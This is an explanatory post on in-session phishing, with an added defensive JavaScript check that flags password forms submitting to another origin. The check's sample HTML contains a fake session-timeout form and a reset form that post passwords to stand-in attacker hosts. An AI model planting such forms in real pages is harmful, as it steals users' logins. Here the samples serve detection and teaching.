In-Session Phishing

The in-session phishing attack is a game-changer. Rather than luring the victim to a look-alike site, it exploits the trust the victim already places in a legitimate site (e.g. shopping, banking) by interrupting an authenticated session with a pop-up. The pop-up might say "Your session has timed out, please log on again" or "please reset your password". Because it appears to come from the trusted site, the victim complies, sending login credentials not to the trusted server but to the attacker.


Consider the analogy that a trusted site is like your home. You protect your credentials the way you protect the keys to your front door, and once you've crossed the threshold of either, you feel safe and your guard is down. Anything that happens from that point on is assumed to be safe. So when a pop-up appears during one of these trusted sessions, you are not suspicious. You do not consider that it could be like a stranger suddenly appearing in your living room.

We are still very focused on protecting the front door, but that is myopic: it ignores the possibility that at some point the session itself could be compromised or hijacked.

Alas, we have to be more vigilant when using protected sites. We cannot assume that crossing the front door means the session stays safe until we log out. Web browsers need to start verifying the source of pop-ups, and let users check a pop-up's validity. But users would probably verify pop-ups about as often as they currently verify SSL certificates (i.e. rarely).
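The attack described at the top of the post and the browser-side check proposed here come down to one question: does the dialog asking for a password submit it to the origin of the page the user believes they are on? The following script is an added example, not code from the original post or from any browser. It resolves each credential form's `action` the way a browser would and flags the ones whose submit origin differs from the page origin. The HTML, the page URL and the hostnames are all constructed for the example.

```javascript
// Added example (not from the original post): flag credential forms whose
// submit target is not the origin of the page the user thinks they are on.
// The in-session pop-up is a form that looks like the site's own "log in
// again" dialog but posts the password to an attacker-controlled host.
// The page URL, markup and hostnames below are constructed for the example.

const PAGE_URL = "https://bank.example/account";

const SAMPLE_HTML = `
<form id="real-login" action="/session/login" method="post">
  <input name="user"><input name="pass" type="password">
</form>
<div class="popup">Your session has timed out, please log on again
  <form id="fake-relogin" action="https://bank-example-verify.test/collect" method="post">
    <input name="user"><input name="pass" type="password">
  </form>
</div>
<form id="search" action="https://search.partner.test/q" method="get">
  <input name="q">
</form>
<form id="scheme-relative" action="//cdn.bank.example.attacker.test/reset" method="post">
  <input name="newpass" type="password">
</form>
`;

// Pull each <form ...>...</form> out of the markup with its id, action and
// whether it contains a password field. A regex is enough for this constructed
// sample; real code would walk document.forms instead, which also sees forms
// injected into the DOM after the page loaded.
function extractForms(html) {
  const forms = [];
  const re = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const id = (/\bid="([^"]*)"/i.exec(attrs) || [null, ""])[1];
    const action = (/\baction="([^"]*)"/i.exec(attrs) || [null, ""])[1];
    const hasPassword = /type="password"/i.test(m[2]);
    forms.push({ id, action, hasPassword });
  }
  return forms;
}

// Resolve the action the way the browser will: relative to the page URL.
// An empty action submits to the page itself (same origin); a scheme-relative
// "//host/path" resolves to another host; a "javascript:" URL has origin "null".
function submitOrigin(action, pageUrl) {
  try {
    return new URL(action, pageUrl).origin;
  } catch {
    return null; // unparseable action: treat as untrusted
  }
}

// Return the credential forms that would send the password somewhere other
// than the page's own origin. Forms without a password field (search boxes,
// newsletter signups) are ignored, since cross-origin GET forms are common
// and harmless.
function findCrossOriginCredentialForms(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  return extractForms(html)
    .filter((f) => f.hasPassword)
    .map((f) => ({ ...f, origin: submitOrigin(f.action, pageUrl) }))
    .filter((f) => f.origin !== pageOrigin);
}

// Usage: list the suspicious forms on the sample page.
for (const f of findCrossOriginCredentialForms(SAMPLE_HTML, PAGE_URL)) {
  console.log(`credential form #${f.id} submits to ${f.origin}, not ${new URL(PAGE_URL).origin}`);
}
```

On the sample page the real login form and the search box pass; the injected "session timed out" dialog and the scheme-relative reset form are flagged. The check only covers the plain form-submission case: a pop-up that ships the password with a script call instead of a form `action`, or an attacker who has already gained script execution on the trusted origin, would need the browser to watch outgoing requests rather than form attributes.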

Unfortunately (going back to our analogy) this added vigilance is akin to checking every room and looking around corners even when you're home! That could prove too much for the average user. Let's hope a technical solution arrives soon.
